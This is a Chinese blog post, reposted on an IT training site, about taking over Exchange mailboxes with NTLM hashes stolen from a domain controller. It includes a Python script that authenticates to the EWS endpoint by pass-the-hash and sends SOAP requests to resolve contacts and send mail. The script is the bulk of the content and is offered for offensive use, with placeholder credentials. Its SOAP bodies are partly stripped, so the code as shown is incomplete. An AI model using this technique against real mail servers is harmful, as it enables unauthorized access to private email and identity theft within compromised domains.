exchange服务器之使用NTLM HASH 接管exchange 邮件
白羽 2018-12-11 来源 :网络 阅读 2828 评论 0

摘要:本文将带你了解exchange服务器之使用NTLM HASH 接管exchange 邮件,希望本文对大家学Exchange有所帮助。

    本文将带你了解exchange服务器之使用NTLM HASH 接管exchange 邮件,希望本文对大家学Exchange有所帮助。


场景:在域控上抓了hash之后,过段时间后域控权限丢了,无法通过PTH直接到目标机器(比如他用的是MAC或者像我一样上层是个路由器),这种情况下想去获取目标邮件相关信息。

exchange的ews接口支持ntlm认证,所以直接使用ntlm认证就行了,这里唯一不同的是要使用ntlm hash去进行认证,这块已经有人造好轮子了https://github.com/mullender/python-ntlm,这里直接拿来使用就行了,原理是使用ntlm hash去生成挑战值。

类似的项目还有一个就是https://github.com/requests/requests-ntlm,从代码里面看这个貌似也支持pth,测试了半天之后发现是作者瞎写的注释。


实例代码(这里拿我们观星实验室落叶纷飞大牛和darkray大牛的hash测试)

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# @Time    : 2018/1/2 下午8:38

# @Author  : iswin

# @File    : main.py

# @Software: PyCharm

import urllib2


from HTTPNtlmAuthHandler import HTTPNtlmAuthHandler


url = "https://mail.xxx.com/ews/exchange.asmx"



def searchContact(keywords):

SOAP = '''

           <soap:Envelope

               xmlns:xsi="//www.w3.org/2001/XMLSchema-instance"

               xmlns:xsd="//www.w3.org/2001/XMLSchema"

               xmlns:soap="//schemas.xmlsoap.org/soap/envelope/"

               xmlns:t="//schemas.microsoft.com/exchange/services/2006/types">

               

                   <ResolveNames

                       xmlns="//schemas.microsoft.com/exchange/services/2006/messages"

                       xmlns:t="//schemas.microsoft.com/exchange/services/2006/types" ReturnFullContactData="true">

                       {}

                   

               

           

       '''.format(keywords)


auth_NTLM = auth()

opener = urllib2.build_opener(auth_NTLM)

urllib2.install_opener(opener)

req = urllib2.Request(url, data=SOAP)

req.add_header('Content-Type', 'text/xml')

response = urllib2.urlopen(req)

print(response.read())



def sendMail(mailto=''):

SOAP = '''

   


       

     

   '''

auth_NTLM = auth()

opener = urllib2.build_opener(auth_NTLM)

urllib2.install_opener(opener)

req = urllib2.Request(url, data=SOAP)

req.add_header('Content-Type', 'text/xml')

response = urllib2.urlopen(req)

print(response.read())



def auth():

# user = 'xxx\xx'

# password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'


user = 'xxxss\sssssss'

password = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()

passman.add_password(None, url, user, password)

auth_NTLM = HTTPNtlmAuthHandler(passman)

return auth_NTLM



if __name__ == '__main__':

sendMail()

# searchContact('iswin')



其它操作,比如收邮件,根据关键字去获取邮件信息等,参考微软的exchange ews api即可。

   

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标系统运维之Exchange频道!

本文由 @白羽 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程